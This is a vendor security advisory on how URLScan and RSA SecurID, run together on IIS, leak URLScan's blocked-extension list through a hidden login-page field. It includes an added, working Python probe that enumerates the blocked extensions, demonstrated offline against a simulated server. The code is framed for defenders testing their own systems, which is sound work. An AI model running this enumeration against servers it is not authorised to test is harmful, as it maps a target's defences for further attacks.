J-Security Center

Title: Microsoft URLScan / RSA Security SecurID Configuration Enumeration Weakness

Severity: MODERATE

Description:

Microsoft URLScan is an Internet Server API (ISAPI) filter for IIS that can be configured to block HTTP methods, access to files with particular extensions, and other classes of request before they reach the web application.

SecurID, a two-factor authentication mechanism developed by RSA Security, can also be used to prevent unauthorized access to a website; on IIS its web component is likewise installed as an ISAPI filter.

A weakness has been discovered in Microsoft URLScan and RSA Security SecurID when the two are used together on the same web server. The problem is reported to depend on the order in which the two filters appear in the global ISAPI filter list: URLScan's rejection of a request is not hidden from the SecurID filter, so the URL URLScan substitutes for a rejected request surfaces in the SecurID login page.

When the vulnerable configuration is in place, an attacker can enumerate URLScan's extension filtering list by making repeated requests for files with differing extensions. For a blocked extension the web server incorrectly returns a login page containing a hidden form field whose NAME is 'referrer' and whose VALUE contains 'Rejected-By-UrlScan' (URLScan's default RejectResponseUrl is /<Rejected-By-UrlScan>); for a permitted extension the field reflects the URL that was actually requested. If the default RejectResponseUrl has been changed, the rejection string differs accordingly, but the blocked and permitted responses remain distinguishable.
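The following is an added example, not code from the original advisory or from either vendor, showing how the enumeration described above works and how a defender can reproduce it against their own server. The HTTP transport is passed in as a callable so the logic runs offline here against a constructed stand-in for the misconfigured server; the stand-in's deny list (.exe, .bat, .ida, .idq), the form layout and the `/securid/login` action are assumptions made for the demonstration.

```python
"""Enumerate URLScan's extension deny list through a SecurID-style login page
that leaks URLScan's rejection URL in a hidden 'referrer' field.

Added example, not part of the original advisory. All server behaviour below
is a constructed stand-in; use urllib_fetch() only against a host you are
authorised to test.
"""
import html
import urllib.error
import urllib.request
from html.parser import HTMLParser
from typing import Callable, Dict, List

# URLScan's default RejectResponseUrl is /<Rejected-By-UrlScan>; this is the
# substring the advisory says appears in the hidden field's VALUE.
DEFAULT_MARKER = "Rejected-By-UrlScan"


class HiddenFieldParser(HTMLParser):
    """Collects NAME/VALUE pairs of hidden <input> elements from an HTML body."""

    def __init__(self) -> None:
        super().__init__()
        self.fields: Dict[str, str] = {}

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag.lower() != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("type", "").lower() == "hidden" and "name" in a:
            self.fields[a["name"]] = a.get("value", "")


def hidden_fields(body: str) -> Dict[str, str]:
    parser = HiddenFieldParser()
    parser.feed(body)
    return parser.fields


def is_urlscan_rejection(body: str, marker: str = DEFAULT_MARKER) -> bool:
    """True when the hidden 'referrer' field carries the rejection marker,
    i.e. URLScan rewrote the URL before the SecurID filter rendered its page."""
    return marker in hidden_fields(body).get("referrer", "")


def enumerate_blocked_extensions(fetch: Callable[[str], str], extensions: List[str],
                                 marker: str = DEFAULT_MARKER,
                                 probe_name: str = "probe") -> List[str]:
    """Request one non-existent file per extension; keep those URLScan rejected.
    Pass a different marker if the target's RejectResponseUrl was customised."""
    blocked: List[str] = []
    for ext in extensions:
        if is_urlscan_rejection(fetch(f"/{probe_name}{ext}"), marker):
            blocked.append(ext)
    return blocked


def urllib_fetch(base_url: str, timeout: float = 10.0) -> Callable[[str], str]:
    """Real transport for an authorised test; not used by the offline demo."""
    def fetch(path: str) -> str:
        try:
            with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=timeout) as resp:
                return resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:  # login page may arrive with a non-200 status
            return e.read().decode("utf-8", "replace")
    return fetch


# --- constructed stand-in for the misconfigured server (assumed, for the demo) ---
_LOGIN_FORM = ('<html><body><form method="POST" action="/securid/login">'
               '<input type="hidden" name="referrer" value="{ref}">'
               '<input type="text" name="username">'
               '<input type="password" name="passcode"></form></body></html>')
_FAKE_DENY_LIST = {".exe", ".bat", ".ida", ".idq"}  # hypothetical DenyExtensions


def fake_fetch(path: str) -> str:
    """Mimics the SecurID login page. When URLScan rejected the URL first, the
    hidden field shows URLScan's rewritten URL rather than the one requested."""
    ext = path[path.rfind("."):] if "." in path else ""
    ref = "/<Rejected-By-UrlScan>" if ext in _FAKE_DENY_LIST else path
    return _LOGIN_FORM.format(ref=html.escape(ref, quote=True))


SAMPLE_REJECTED = fake_fetch("/probe.exe")   # constructed blocked response
SAMPLE_ALLOWED = fake_fetch("/probe.htm")    # constructed permitted response

if __name__ == "__main__":
    exts = [".htm", ".asp", ".exe", ".bat", ".ida", ".idq", ".txt"]
    print("blocked extensions:", enumerate_blocked_extensions(fake_fetch, exts))
```

The check keys on the hidden field's NAME and VALUE rather than on the HTTP status, because both the blocked and the permitted probes come back as the same login page; only the reflected URL differs. A defender can run the same probe set against a fixed server and confirm that every extension now produces an identical response.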

Knowing which extensions URLScan filters tells an attacker which request types are not blocked, and so can aid further attacks against the target web server.

Affected Products:

  • Microsoft URLScan 2.5.0
  • RSA Security SecurID 5.0.0

Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.